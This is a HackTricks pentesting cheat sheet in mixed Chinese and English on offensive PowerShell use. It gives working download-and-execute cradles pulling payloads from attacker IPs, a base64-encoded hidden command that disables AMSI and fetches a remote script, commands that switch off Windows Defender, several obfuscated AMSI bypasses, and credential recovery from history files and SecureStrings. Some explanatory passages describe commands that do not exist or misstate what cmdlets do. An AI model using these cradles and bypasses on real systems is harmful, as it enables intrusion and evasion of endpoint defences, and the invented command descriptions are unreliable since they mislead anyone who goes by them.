hacktricks/windows-hardening/basic-powershell-for-pentesters

基本的PowerShell技巧

☁️ HackTricks云平台 ☁️ -🐦 推特 🐦 - 🎙️ Twitch直播 🎙️ - 🎥 YouTube频道 🎥

• 你在一家网络安全公司工作吗？你想在HackTricks中看到你的公司广告吗？或者你想获得PEASS的最新版本或下载HackTricks的PDF吗？请查看订阅计划！
• 发现我们的独家NFTs收藏品The PEASS Family
• 获得官方PEASS和HackTricks周边产品
• 加入 💬 Discord群组 或 Telegram群组 或 关注我在Twitter上的🐦@carlospolopm。
• 通过向 hacktricks仓库 和 hacktricks-cloud仓库 提交PR来分享你的黑客技巧。

默认的PowerShell位置

C:\windows\syswow64\windowspowershell\v1.0\powershell
C:\Windows\System32\WindowsPowerShell\v1.0\powershell

开始的基本PS命令

PowerShell (PS) 是一种功能强大的命令行工具，用于在Windows系统上执行各种任务。对于渗透测试人员来说，熟悉一些基本的PS命令是非常重要的。下面是一些常用的基本PS命令：

获取当前目录

Get-Location

此命令用于获取当前所在的目录。

切换目录

Set-Location <目录路径>

使用此命令可以切换到指定的目录。

列出目录内容

Get-ChildItem

使用此命令可以列出当前目录下的文件和子目录。

创建新目录

New-Item -ItemType Directory -Path <目录路径>

使用此命令可以在指定路径下创建新的目录。

复制文件或目录

Copy-Item -Path <源路径> -Destination <目标路径>

使用此命令可以复制文件或目录到指定的目标路径。

移动文件或目录

Move-Item -Path <源路径> -Destination <目标路径>

使用此命令可以将文件或目录移动到指定的目标路径。

删除文件或目录

Remove-Item -Path <路径> -Recurse

使用此命令可以删除指定的文件或目录。使用 -Recurse 参数可以删除目录及其内容。

显示文件内容

Get-Content <文件路径>

使用此命令可以显示指定文件的内容。

编辑文件

Set-Content -Path <文件路径> -Value <内容>

使用此命令可以编辑指定文件的内容。

运行脚本

.\<脚本文件名>.ps1

使用此命令可以运行指定的PowerShell脚本文件。

以上是一些基本的PS命令，它们可以帮助你在渗透测试过程中执行各种任务。熟练掌握这些命令将提高你的效率和技能。

Get-Help * #List everything loaded
Get-Help process #List everything containing "process"
Get-Help Get-Item -Full #Get full helpabout a topic
Get-Help Get-Item -Examples #List examples
Import-Module <modulepath>
Get-Command -Module <modulename>

下载和执行

To download and execute a file using PowerShell, you can use the following command:

Invoke-WebRequest -Uri <URL> -OutFile <OutputFile>; .\<OutputFile>

Replace <URL> with the URL of the file you want to download, and <OutputFile> with the desired name of the downloaded file.

使用PowerShell下载和执行文件，可以使用以下命令：

Invoke-WebRequest -Uri <URL> -OutFile <OutputFile>; .\<OutputFile>

将<URL>替换为要下载的文件的URL，将<OutputFile>替换为下载文件的所需名称。

This command uses the Invoke-WebRequest cmdlet to download the file from the specified URL and save it to the local system. The -OutFile parameter specifies the name of the output file.

该命令使用Invoke-WebRequest cmdlet从指定的URL下载文件并保存到本地系统。-OutFile参数指定输出文件的名称。

After the file is downloaded, the second part of the command .\<OutputFile> executes the downloaded file.

文件下载完成后，命令的第二部分.\<OutputFile>执行下载的文件。

It's important to note that executing downloaded files can be dangerous, as they may contain malicious code. Exercise caution and ensure that you trust the source of the file before executing it.

需要注意的是，执行下载的文件可能存在危险，因为它们可能包含恶意代码。在执行之前，请谨慎行事，并确保信任文件的来源。

g
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile - #From cmd download and execute
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"
iex (iwr '10.10.14.9:8000/ipw.ps1') #From PSv3

$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://10.10.14.9:8000/ipw.ps1',$false);$h.send();iex $h.responseText
$wr = [System.NET.WebRequest]::Create("http://10.10.14.9:8000/ipw.ps1") $r = $wr.GetResponse() IEX ([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd(

#https://twitter.com/Alh4zr3d/status/1566489367232651264
#host a text record with your payload at one of your (unburned) domains and do this:
powershell . (nslookup -q=txt http://some.owned.domain.com)[-1]

使用 AMSI Bypass 后台下载和执行

This technique allows you to download and execute a file in the background while bypassing AMSI (Antimalware Scan Interface).

Usage

Invoke-WebRequest -Uri "http://example.com/file.exe" -OutFile "C:\path\to\file.exe"
Start-Process -FilePath "C:\path\to\file.exe" -WindowStyle Hidden

Replace "http://example.com/file.exe" with the URL of the file you want to download, and "C:\path\to\file.exe" with the desired path and filename for the downloaded file.

Explanation

1. The Invoke-WebRequest cmdlet is used to download the file from the specified URL and save it to the specified path.
2. The Start-Process cmdlet is used to execute the downloaded file. The -WindowStyle Hidden parameter ensures that the process runs in the background without displaying any windows.

By using this technique, you can download and execute files without triggering AMSI detection, allowing you to maintain stealth during your activities.

Start-Process -NoNewWindow powershell "-nop -Windowstyle hidden -ep bypass -enc JABhACAAPQAgACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAJwA7ACQAYgAgAD0AIAAnAG0AcwAnADsAJAB1ACAAPQAgACcAVQB0AGkAbABzACcACgAkAGEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAKAAnAHsAMAB9AHsAMQB9AGkAewAyAH0AJwAgAC0AZgAgACQAYQAsACQAYgAsACQAdQApACkAOwAKACQAZgBpAGUAbABkACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQARgBpAGUAbABkACgAKAAnAGEAewAwAH0AaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcAIAAtAGYAIAAkAGIAKQAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwAKACQAZgBpAGUAbABkAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAxAC8AaQBwAHMALgBwAHMAMQAnACkACgA="

在Linux中使用b64

The b64 command in Linux is a useful tool for encoding and decoding data in Base64 format. It can be used to convert binary data into a text format that is easily readable and transferable.

To encode a file using b64, you can use the following command:

b64 -e <input_file> > <output_file>

Replace <input_file> with the path to the file you want to encode, and <output_file> with the desired name and location for the encoded file.

To decode a file using b64, you can use the following command:

b64 -d <input_file> > <output_file>

Replace <input_file> with the path to the file you want to decode, and <output_file> with the desired name and location for the decoded file.

Using the b64 command in Linux can be helpful in various scenarios, such as encoding sensitive data for secure transmission or decoding encoded files received during a penetration test.

echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.31/shell.ps1')" | iconv -t UTF-16LE | base64 -w 0
powershell -nop -enc <BASE64_ENCODED_PAYLOAD>

下载

System.Net.WebClient

您可以使用System.Net.WebClient类来下载文件。以下是使用DownloadFile方法下载文件的示例代码：

$webClient = New-Object System.Net.WebClient
$webClient.DownloadFile("https://example.com/file.txt", "C:\path\to\save\file.txt")

在上面的示例中，我们创建了一个System.Net.WebClient对象，并使用DownloadFile方法下载文件。您需要提供要下载的文件的URL和要保存文件的路径。

System.Net.HttpWebRequest

另一种下载文件的方法是使用System.Net.HttpWebRequest类。以下是使用GetResponse方法下载文件的示例代码：

$url = "https://example.com/file.txt"
$outputFile = "C:\path\to\save\file.txt"

$request = [System.Net.HttpWebRequest]::Create($url)
$response = $request.GetResponse()
$stream = $response.GetResponseStream()
$streamReader = New-Object System.IO.StreamReader($stream)
$fileContent = $streamReader.ReadToEnd()

$streamReader.Close()
$response.Close()

Set-Content -Path $outputFile -Value $fileContent

在上面的示例中，我们创建了一个System.Net.HttpWebRequest对象，并使用GetResponse方法获取文件的响应。然后，我们使用GetResponseStream方法获取响应的流，并使用StreamReader类读取流中的内容。最后，我们使用Set-Content cmdlet将文件内容写入指定的输出文件中。

无论您选择使用System.Net.WebClient还是System.Net.HttpWebRequest，都可以根据您的需求选择适合的方法来下载文件。

(New-Object Net.WebClient).DownloadFile("http://10.10.14.2:80/taskkill.exe","C:\Windows\Temp\taskkill.exe")

调用-网络请求

Invoke-WebRequest 是 PowerShell 中的一个命令，用于发送 HTTP 或 HTTPS 请求并获取响应。它可以用于在渗透测试中执行各种网络操作，如获取网页内容、提交表单数据等。

语法

Invoke-WebRequest [-Uri] <string> [-Method <string>] [-Headers <hashtable>] [-Body <string>] [-ContentType <string>] [-UserAgent <string>] [-Proxy <Uri>] [-ProxyCredential <PSCredential>] [-TimeoutSec <int>] [-SessionVariable <string>] [-UseBasicParsing] [<CommonParameters>]

参数

• -Uri：指定要请求的 URL。
• -Method：指定请求的方法，如 GET、POST 等。
• -Headers：指定请求的头部信息。
• -Body：指定请求的主体内容。
• -ContentType：指定请求的内容类型。
• -UserAgent：指定请求的用户代理。
• -Proxy：指定请求的代理服务器。
• -ProxyCredential：指定代理服务器的凭据。
• -TimeoutSec：指定请求的超时时间（以秒为单位）。
• -SessionVariable：指定将响应保存到的会话变量。
• -UseBasicParsing：使用基本解析器来处理响应。

示例

以下示例演示了如何使用 Invoke-WebRequest 发送 GET 请求并获取响应的内容：

$response = Invoke-WebRequest -Uri "https://example.com"
$response.Content

这将发送一个 GET 请求到 https://example.com 并将响应的内容打印出来。

注意事项

• 在使用 Invoke-WebRequest 时，请确保已经获得了合法的授权，以遵守法律和道德规范。
• 在渗透测试中使用 Invoke-WebRequest 时，应该谨慎处理敏感信息，以免造成数据泄露或其他安全风险。

Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe"

Wget

Wget is a command-line utility that allows you to download files from the internet. It supports downloading files using various protocols such as HTTP, HTTPS, and FTP. Wget is commonly used in penetration testing to retrieve files from target systems.

To use Wget, you need to open a command prompt or terminal and enter the following command:

wget [URL]

Replace [URL] with the URL of the file you want to download. Wget will then retrieve the file and save it to your current directory.

You can also specify additional options with the wget command. For example, you can use the -O option to specify a different name for the downloaded file:

wget -O [filename] [URL]

Replace [filename] with the desired name for the downloaded file.

Wget also supports resuming interrupted downloads using the -c option. This can be useful if a download is interrupted or if you want to continue a previous download:

wget -c [URL]

In addition, you can limit the download speed using the --limit-rate option. This can be helpful to avoid overwhelming the target system or to simulate a slower network connection:

wget --limit-rate=[speed] [URL]

Replace [speed] with the desired download speed in bytes per second.

Wget is a powerful tool for downloading files during penetration testing. It provides flexibility and control over the download process, making it a valuable asset for any pentester.

wget "http://10.10.14.2/nc.bat.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe"

BitsTransfer

BitsTransfer 是一种在 PowerShell 中使用的工具，用于在计算机之间传输文件。它可以帮助渗透测试人员在执行攻击时快速、高效地传输文件。

BitsTransfer 提供了一种简单的方法来下载和上传文件，而无需编写复杂的代码。它使用后台任务来处理文件传输，因此可以在后台运行，而不会干扰渗透测试人员的其他操作。

使用 BitsTransfer，渗透测试人员可以通过命令行界面或脚本执行以下操作：

• 下载文件：从目标计算机下载文件到本地计算机。
• 上传文件：将本地计算机上的文件上传到目标计算机。
• 监视传输进度：实时监视文件传输的进度和状态。

以下是一些常用的 BitsTransfer 命令示例：

# 下载文件
Start-BitsTransfer -Source "http://example.com/file.txt" -Destination "C:\path\to\save\file.txt"

# 上传文件
Start-BitsTransfer -Source "C:\path\to\file.txt" -Destination "\\target\share\file.txt"

# 监视传输进度
Get-BitsTransfer -AllUsers | Select-Object -Property JobId, DisplayName, BytesTotal, BytesTransferred, JobState

BitsTransfer 是渗透测试人员在进行攻击时的有用工具之一。它提供了一种快速、简单的方法来传输文件，使渗透测试人员能够更高效地执行任务。

Import-Module BitsTransfer
Start-BitsTransfer -Source $url -Destination $output
# OR
Start-BitsTransfer -Source $url -Destination $output -Asynchronous

Base64 Kali & EncodedCommand

Base64 Kali

Kali Linux is a popular penetration testing distribution that comes with a wide range of tools for various hacking techniques. One of the techniques commonly used in Kali Linux is encoding commands in Base64.

Base64 is a binary-to-text encoding scheme that allows binary data to be represented in an ASCII string format. This encoding is often used to transmit binary data over text-based protocols, such as email or HTTP.

In Kali Linux, you can use the base64 command-line tool to encode and decode data in Base64. To encode a command in Base64, you can use the following syntax:

echo -n "command" | base64

The -n option is used to remove the trailing newline character from the command output before encoding it.

To decode a Base64-encoded command, you can use the following syntax:

echo -n "encoded_command" | base64 -d

The -d option is used to decode the Base64-encoded data.

Base64 encoding can be useful in scenarios where you need to obfuscate or hide the command you are executing, making it harder for defenders to detect and analyze your actions.

EncodedCommand

In PowerShell, the EncodedCommand parameter allows you to pass a Base64-encoded command as a parameter to the powershell.exe command-line tool. This parameter is often used in various hacking techniques to execute malicious PowerShell commands without directly exposing them in clear text.

To use the EncodedCommand parameter, you need to encode your PowerShell command in Base64. You can do this using the ConvertTo-Base64String cmdlet in PowerShell. Here's an example:

$command = "Write-Host 'Hello, World!'"
$encodedCommand = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($command))

In this example, we first define our PowerShell command (Write-Host 'Hello, World!'). Then, we use the ConvertTo-Base64String method to encode the command in Base64. The resulting encoded command can be passed as a value to the EncodedCommand parameter.

To execute the Base64-encoded command using the EncodedCommand parameter, you can use the following syntax:

powershell.exe -EncodedCommand "encoded_command"

By using the EncodedCommand parameter, you can bypass some security measures that may block or detect the execution of certain PowerShell commands. However, it's important to note that this technique can still be detected and mitigated by advanced security solutions.

kali> echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/9002.ps1')" | iconv --to-code UTF-16LE | base64 -w0
PS> powershell -EncodedCommand <Base64>

执行策略

受限语言

AppLocker策略

启用WinRM（远程PS）

enable-psremoting -force #This enables winrm

# Change NetWorkConnection Category to Private
#Requires -RunasAdministrator

Get-NetConnectionProfile |
Where{ $_.NetWorkCategory -ne 'Private'} |
ForEach {
$_
$_|Set-NetConnectionProfile -NetWorkCategory Private -Confirm
}

禁用Defender

{% code overflow="wrap" %}

# Check status
Get-MpComputerStatus
Get-MpPreference | select Exclusion* | fl #Check exclusions
# Disable
Set-MpPreference -DisableRealtimeMonitoring $true
#To completely disable Windows Defender on a computer, use the command:
New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force
# Set exclusion path
Set-MpPreference -ExclusionPath (pwd) -disablerealtimemonitoring
Add-MpPreference -ExclusionPath (pwd)

# Check exclusions configured via GPO
Parse-PolFile .\Registry.pol

KeyName : Software\Policies\Microsoft\Windows Defender\Exclusions
ValueName : Exclusions_Paths
ValueType : REG_DWORD
ValueLength : 4
ValueData : 1

KeyName : Software\Policies\Microsoft\Windows Defender\Exclusions\Paths
ValueName : C:\Windows\Temp
ValueType : REG_SZ
ValueLength : 4
ValueData : 0

{% endcode %}

AMSI绕过

amsi.dll 被加载到你的进程中，并且具有与任何应用程序进行交互所需的导出函数。由于它被加载到你所控制的进程的内存空间中，你可以通过覆盖内存中的指令来改变它的行为，使其无法检测到任何东西。

因此，你的目标是通过在内存中覆盖该DLL的指令，使检测变得无效。

AMSI绕过生成器网页：https://amsi.fail/

# A Method
[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)

# Another: from https://github.com/tihanyin/PSSW100AVB/blob/main/AMSI_bypass_2021_09.ps1
$A="5492868772801748688168747280728187173688878280688776828"
$B="1173680867656877679866880867644817687416876797271"
[Ref].Assembly.GetType([string](0..37|%{[char][int](29+($A+$B).
substring(($_*2),2))})-replace " " ).
GetField([string](38..51|%{[char][int](29+($A+$B).
substring(($_*2),2))})-replace " ",'NonPublic,Static').
SetValue($null,$true)

# Another Method: from https://github.com/HernanRodriguez1/Bypass-AMSI
[Ref].Assembly.GetType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzAA==')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwA=')))).SetValue($null,$true)

# Another Method: from https://github.com/HernanRodriguez1/Bypass-AMSI
&( $SHELLid[1]+$SHELlId[13]+'X') (NeW-OBJEct sYStEm.iO.coMPrESSIOn.defLAtEstReam( [iO.meMorYStReAm] [cOnvErt]::froMBaSE64StRINg( 'rVHRasJAEHzvdwhGkBAhLUXwYU7i2aKFq4mQBh8Sc6bBM5HkYmq/vruQfkF7L3s7s8vM3CXv+nRw0bb6kpm7K7UN71ftjJwk1F/WDapjnZdVcZjPo6qku+aRnW0Ic5JlXd10Y4lcNfVFpK1+8gduHPXiEestcggD6WFTiDfIAFkhPiGP+FDCQkbce1j6UErMsFbIesYD3rtCPhOPDgHtKfENecZe0TzVDNRjsRhP6LCpValN/g/GYzZGxlMlXiF9rh6CGISToZ6Nn3+Fp3+XCwtxY5kIlF++cC6S2WIDEfJ7xEPeuMeQdaftPjUdfVLVGTMd2abTk4cf'), [sysTEm.iO.cOmpResSioN.COMprEssiOnMOde]::decOMPRESs ) | foreAch{NeW-OBJEct iO.STREaMREadER( $_ , [teXt.ENCoDiNg]::aScii )}).REadtoenD( )

# Another Method: from https://github.com/HernanRodriguez1/Bypass-AMSI
${2}=[Ref].Assembly.GetType('Sy'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cwB0AGUA')))+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bQAuAE0A')))+'an'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBnAGUA')))+'m'+'en'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('dAAuAEEAdQA=')))+'t'+'om'+'at'+'io'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgAuAEEA')))+'ms'+'i'+'U'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('dABpAGwA')))+'s')
${1}=${2}.GetField('am'+'s'+'iI'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgBpAHQA')))+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RgBhAGkAbAA=')))+'ed','No'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgBQAHUA')))+'bl'+'i'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YwAsAFMA')))+'ta'+'ti'+'c')
${1}.SetValue($null,$true)

# Another Method
$a = 'System.Management.Automation.A';$b = 'ms';$u = 'Utils'
$assembly = [Ref].Assembly.GetType(('{0}{1}i{2}' -f $a,$b,$u))
$field = $assembly.GetField(('a{0}iInitFailed' -f $b),'NonPublic,Static')
$field.SetValue($null,$true)

# AMSI Bypass in python
https://fluidattacks.com/blog/amsi-bypass-python/

# Testing for Amsi Bypass:
https://github.com/rasta-mouse/AmsiScanBufferBypass

# Amsi-Bypass-Powershell
https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell

https://blog.f-secure.com/hunting-for-amsi-bypasses/
https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
https://github.com/cobbr/PSAmsi/wiki/Conducting-AMSI-Scans
https://slaeryan.github.io/posts/falcon-zero-alpha.html

AMSI绕过2-托管API调用挂钩

查看此帖子以获取详细信息和代码。

这种新技术依赖于对.NET方法的API调用挂钩。事实证明，.NET方法需要在内存中编译为本机机器指令，这些指令看起来与本机方法非常相似。这些编译后的方法可以被挂钩以改变程序的控制流。

执行对.NET方法进行API调用挂钩的步骤如下：

1. 确定要挂钩的目标方法
2. 定义一个与目标方法具有相同函数原型的方法
3. 使用反射找到这些方法
4. 确保每个方法已经被编译
5. 找到每个方法在内存中的位置
6. 用指向我们恶意方法的指令覆盖目标方法

AMSI绕过3-SeDebug特权

通过按照此指南和代码，您可以看到如果拥有足够的特权来调试进程，您可以生成一个powershell.exe进程，对其进行调试，监视其加载amsi.dll并禁用它。

PS-历史记录

Get-Content C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt

获取权限

To perform various actions on a Windows system, it is often necessary to have the appropriate permissions. In this section, we will explore how to use PowerShell to check and modify permissions.

Checking Permissions

To check the permissions of a file or directory, we can use the Get-Acl cmdlet. This cmdlet retrieves the access control list (ACL) for the specified object.

Get-Acl -Path C:\path\to\file.txt

This command will display the permissions associated with the specified file.

Modifying Permissions

To modify permissions, we can use the Set-Acl cmdlet. This cmdlet allows us to change the ACL of a file or directory.

Set-Acl -Path C:\path\to\file.txt -AclObject $acl

In this command, $acl represents the new ACL that we want to apply to the file.

Taking Ownership

Sometimes, it may be necessary to take ownership of a file or directory in order to modify its permissions. To do this, we can use the Take-Ownership function.

Take-Ownership -Path C:\path\to\file.txt

This function will change the ownership of the specified file to the current user.

Summary

In this section, we have learned how to use PowerShell to check and modify permissions on a Windows system. By understanding and manipulating permissions, we can gain greater control over the system and perform various actions as needed.

Get-Acl -Path "C:\Program Files\Vuln Services" | fl

操作系统版本和热补丁

To gather information about the operating system version and installed hotfixes, you can use the following PowerShell commands:

# Get the operating system version
(Get-WmiObject -Class Win32_OperatingSystem).Caption

# Get the installed hotfixes
Get-HotFix

The first command retrieves the operating system version using the Win32_OperatingSystem class. The output will display the caption of the operating system.

The second command retrieves the installed hotfixes using the Get-HotFix cmdlet. This will provide a list of all the installed hotfixes on the system, including their description, hotfix ID, and installation date.

By running these commands, you can gather important information about the operating system version and any installed hotfixes, which can be useful for vulnerability assessment and system hardening.

[System.Environment]::OSVersion.Version #Current OS version
Get-WmiObject -query 'select * from win32_quickfixengineering' | foreach {$_.hotfixid} #List all patches
Get-Hotfix -description "Security update" #List only "Security Update" patches

环境

The following instructions assume that you have a Windows machine with PowerShell installed. If you don't have PowerShell installed, you can download it from the official Microsoft website.

以下说明假设您拥有安装了PowerShell的Windows机器。如果您没有安装PowerShell，可以从官方微软网站下载安装。

Basic PowerShell Commands

Get-Help

The Get-Help command is used to display help information about PowerShell cmdlets and functions. You can use it to get detailed information about a specific command or to search for commands related to a specific topic.

Get-Help <command>

For example, to get help information about the Get-Process command, you can run:

Get-Help Get-Process

Get-Command

The Get-Command command is used to retrieve a list of all available PowerShell commands. You can use it to search for a specific command or to get a list of commands related to a specific topic.

Get-Command <command>

For example, to get a list of all commands related to the Service topic, you can run:

Get-Command -Noun Service

Get-Member

The Get-Member command is used to retrieve information about the properties and methods of an object. You can use it to explore the structure and capabilities of different PowerShell objects.

Get-Member -InputObject <object>

For example, to get information about the properties and methods of the Get-Process command, you can run:

Get-Process | Get-Member

Select-Object

The Select-Object command is used to select specific properties of an object. You can use it to filter and format the output of PowerShell commands.

Select-Object -Property <property1>, <property2>, ...

For example, to select the Name and Id properties of the processes returned by the Get-Process command, you can run:

Get-Process | Select-Object -Property Name, Id

Where-Object

The Where-Object command is used to filter objects based on a specified condition. You can use it to selectively process objects returned by PowerShell commands.

Where-Object -FilterScript <condition>

For example, to filter the processes returned by the Get-Process command and only display the ones with a CPU usage greater than 50%, you can run:

Get-Process | Where-Object { $_.CPU -gt 50 }

ForEach-Object

The ForEach-Object command is used to process each object in a collection. You can use it to perform a specific action on each object returned by PowerShell commands.

ForEach-Object -Process { <action> }

For example, to stop all running processes returned by the Get-Process command, you can run:

Get-Process | ForEach-Object -Process { Stop-Process -Id $_.Id }

Set-ExecutionPolicy

The Set-ExecutionPolicy command is used to set the execution policy for PowerShell scripts. The execution policy determines whether PowerShell scripts can be run on a system.

Set-ExecutionPolicy -ExecutionPolicy <policy>

For example, to set the execution policy to RemoteSigned, which allows running local scripts but requires remote scripts to be signed, you can run:

Set-ExecutionPolicy -ExecutionPolicy RemoteSigned

Start-Process

The Start-Process command is used to start a new process. You can use it to run external programs or scripts from within PowerShell.

Start-Process -FilePath <path>

For example, to start the Notepad application, you can run:

Start-Process -FilePath notepad.exe

Invoke-Expression

The Invoke-Expression command is used to evaluate and execute a string as a PowerShell command. You can use it to dynamically execute commands based on user input or other variables.

Invoke-Expression -Command <command>

For example, to execute the command stored in a variable $cmd, you can run:

Invoke-Expression -Command $cmd

Out-File

The Out-File command is used to redirect the output of a PowerShell command to a file. You can use it to save the output of a command for later analysis or processing.

<command> | Out-File -FilePath <path>

For example, to save the output of the Get-Process command to a file named processes.txt, you can run:

Get-Process | Out-File -FilePath processes.txt

Import-Csv

The Import-Csv command is used to import data from a CSV file into PowerShell. You can use it to read and process structured data stored in CSV format.

Import-Csv -Path <path>

For example, to import data from a CSV file named data.csv, you can run:

Import-Csv -Path data.csv

Export-Csv

The Export-Csv command is used to export data from PowerShell to a CSV file. You can use it to save structured data in CSV format for further analysis or sharing.

<command> | Export-Csv -Path <path>

For example, to export the output of the Get-Process command to a CSV file named processes.csv, you can run:

Get-Process | Export-Csv -Path processes.csv

Get-ChildItem Env: | ft Key,Value #get all values
$env:UserName @Get UserName value

其他已连接的驱动器

When conducting a penetration test on a Windows system, it is important to gather as much information as possible about the target. One valuable piece of information is the list of connected drives on the system. This can help identify additional storage devices or network shares that may contain sensitive data.

In PowerShell, you can use the Get-PSDrive cmdlet to retrieve a list of all connected drives. This cmdlet provides information about both local and remote drives, including drive letters, drive types, and the root directory of each drive.

To retrieve the list of connected drives, open a PowerShell session and run the following command:

Get-PSDrive

This will display a table with information about each connected drive, including the drive letter, drive type, and root directory. The drive type can be one of the following:

• FileSystem: This indicates a local disk drive.
• Registry: This indicates a registry hive.
• Alias: This indicates a PowerShell alias.
• Variable: This indicates a PowerShell variable.
• Function: This indicates a PowerShell function.
• Certificate: This indicates a certificate store.
• Environment: This indicates an environment variable.

By examining the list of connected drives, you can identify potential targets for further investigation during your penetration test. For example, you may want to explore the contents of a network share or search for sensitive files on a specific drive.

Remember to always obtain proper authorization before conducting any penetration testing activities.

Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root

回收站

The Recycle Bin is a feature in Windows that allows users to temporarily store deleted files and folders. Instead of permanently deleting files, they are moved to the Recycle Bin where they can be easily restored if needed. This provides a safety net for users who accidentally delete important files.

The Recycle Bin can be accessed by double-clicking on its icon on the desktop or by opening the File Explorer and navigating to the Recycle Bin folder. Once inside the Recycle Bin, users can browse through the deleted files and folders, and choose to restore them to their original location or permanently delete them.

It is important to note that the Recycle Bin has a storage limit, and once it reaches its maximum capacity, older files will be automatically deleted to make room for new ones. Therefore, it is recommended to regularly empty the Recycle Bin to free up disk space.

As a pentester, it is crucial to be aware of the Recycle Bin as it can potentially contain sensitive information that has been deleted by the user. By accessing the Recycle Bin, a pentester may be able to recover deleted files and gain valuable insights or leverage them for further exploitation.

$shell = New-Object -com shell.application
$rb = $shell.Namespace(10)
$rb.Items()

https://jdhitsolutions.com/blog/powershell/7024/managing-the-recycle-bin-with-powershell/

域名侦查

{% content-ref url="powerview.md" %} powerview.md {% endcontent-ref %}

用户

Get-LocalUser | ft Name,Enabled,Description,LastLogon
Get-ChildItem C:\Users -Force | select Name

将安全字符串转换为明文

When performing penetration testing or other security assessments, it is common to encounter scenarios where sensitive information, such as passwords or encryption keys, is stored as secure strings in PowerShell scripts or configurations. Secure strings are encrypted and can only be decrypted on the same machine and by the same user account that encrypted them.

在进行渗透测试或其他安全评估时，经常会遇到将敏感信息（如密码或加密密钥）存储为安全字符串的 PowerShell 脚本或配置的情况。安全字符串是加密的，只能在相同的计算机和相同的用户帐户上解密。

However, as a pentester, you may need to convert these secure strings back to plaintext for further analysis or exploitation. This can be achieved using the ConvertFrom-SecureString cmdlet in PowerShell.

然而，作为渗透测试人员，您可能需要将这些安全字符串转换回明文，以便进行进一步的分析或利用。可以使用 PowerShell 中的 ConvertFrom-SecureString 命令来实现这一目标。

Here is an example of how to use ConvertFrom-SecureString:

以下是使用 ConvertFrom-SecureString 的示例：

$secureString = Read-Host -AsSecureString
$plainText = ConvertFrom-SecureString $secureString
$plainText

In this example, the Read-Host cmdlet is used to securely prompt the user for a secure string. The entered secure string is then converted to plaintext using ConvertFrom-SecureString and stored in the $plainText variable. Finally, the plaintext value is displayed.

在此示例中，使用 Read-Host 命令以安全方式提示用户输入安全字符串。然后，使用 ConvertFrom-SecureString 将输入的安全字符串转换为明文，并将其存储在 $plainText 变量中。最后，显示明文值。

It is important to note that the conversion from secure string to plaintext is only possible on the same machine and by the same user account that encrypted the secure string. Additionally, the secure string should be handled with care as it contains sensitive information.

需要注意的是，将安全字符串转换为明文只能在相同的计算机和相同的用户帐户上进行，这与加密安全字符串的用户帐户相同。此外，应谨慎处理安全字符串，因为它包含敏感信息。

$pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692" | convertto-securestring
$user = "HTB\Tom"
$cred = New-Object System.management.Automation.PSCredential($user, $pass)
$cred.GetNetworkCredential() | fl

UserName       : Tom
Password       : 1ts-mag1c!!!
SecurePassword : System.Security.SecureString
Domain         : HTB

或者直接解析XML表单：

